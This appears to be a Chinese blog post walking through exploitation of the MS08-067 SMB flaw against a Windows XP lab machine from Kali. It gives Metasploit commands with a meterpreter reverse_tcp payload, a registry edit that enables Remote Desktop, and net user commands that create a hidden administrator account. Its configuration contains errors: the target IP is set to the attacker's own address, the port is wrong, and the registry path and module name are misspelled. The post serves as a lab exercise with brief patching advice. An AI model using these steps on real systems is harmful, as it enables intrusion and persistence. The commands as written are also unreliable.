ms08-067 漏洞攻击(远程命令执行)

渗透测试实战:

准备两台虚拟机

攻击机:kali IP:192.168.10.129 

靶机:WinXPenSP3 IP:192.168.10.128

漏洞描述:

Microsoft  Windows Server 服务 RPC 请求缓冲区溢出漏洞
Windows的 Server 服务在处理特质 RPC 请求时存在缓冲区溢出漏洞,远程攻击者可以通过发送恶意的 RPC 请求触发这个溢出,导致完全入侵用户系统, SYSTEM 权限执行任意指令。
对于Windows 2000 、 XP 和 Server 2003 ,无需认证便可以利用该漏洞;
对于Windows Vista 和 Server 2008 ,可能需要认证。

当用户在受影响的系统上收到RPC请求时,该漏洞会允许远程执行代码,攻击者可以在未经身份验证情况下利用此漏洞运行任意代码。同时,该漏洞可以用于蠕虫攻击。它影响了某些旧版本的Windows系统,包括:

  • Windows 2000
  • Windows XP
  • Windows Server 2003

实战步骤: 

  • 查询靶机是否存活(ping)192.168.10.128

  • 利用nmap查询扫描

  • 进入Msfconsole  使用search 

  • 进入漏洞模块使用 exploit/windonws/smb/ms08_067_netapi

use exploit/Windows/smb/ms08_067_netapi
或者 
use 0

  • 设置攻击信息

# 目标机ip
set RHOST 192.168.10.129
# 端口号
set RPORT 4444
# 设置payload
set payload windows/meterpreter/reverse_tcp
# 攻击机ip
set LHOST 192.168.10.129
# 显示配置信息
show options

  • show options 查看信息无误后执行

  • 进入shell界面 创建账号建立管理员

  • 命令设置注册表

REG ADD HKLM\SYSTEM\CurrentControSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 
# 增加普通用户
net user yjs 123456 /add 
# 提升管理员权限
net localgroup administrators yjs /add

  • 然后重开一个终端使用远程桌面输入新创建的管理员

  • 登录成功

总结

老系统漏洞修复更新系统升级到最新的Windows系统,安装KB958644补丁。

修改远程桌面默认端口,或关闭该服务

学习如同播种,只要你辛勤耕耘,必将收获丰硕的果实,相信你的努力不会白费。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

尤尔哈丶

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值